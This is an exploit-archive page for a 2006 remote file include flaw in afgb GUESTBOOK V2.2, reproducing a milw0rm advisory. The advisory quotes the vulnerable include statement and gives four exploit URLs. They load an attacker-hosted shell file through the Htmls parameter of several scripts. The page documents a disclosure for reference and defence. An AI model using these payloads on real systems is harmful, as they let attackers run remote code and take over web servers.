header-logo
Suggest Exploit
vendor:
GUESTBOOK
by:
mdX
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: GUESTBOOK
Affected Version From: V2.2
Affected Version To: V2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

afgb GUESTBOOK V2.2 Htmls Remote File Include Vulnerability

A vulnerability in afgb GUESTBOOK V2.2 allows remote attackers to include arbitrary files via a URL in the Htmls parameter to unspecified scripts.

Mitigation:

Input validation should be used to prevent the inclusion of files from external sources.
Source

Exploit-DB raw data:

#        afgb GUESTBOOK V2.2                           #
#      Htmls Remote File Include Vulnerability         #
#                       Turkish Hacker's               #
#       Discovered By : mdX                            #
#                                                      #
#------------------------------------------------------
#               Cyber-Warrior TIM                      #
#         Ay ve  YIldIzlar Geceye YakISIr...           #
#        the moon and the stars suit the night         #
########################################################
#
# Class : REmote
########################################################
#             File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include "$Htmls";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
#                         _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################

download link :http://www.afgb.to/ 

# milw0rm.com [2006-10-12]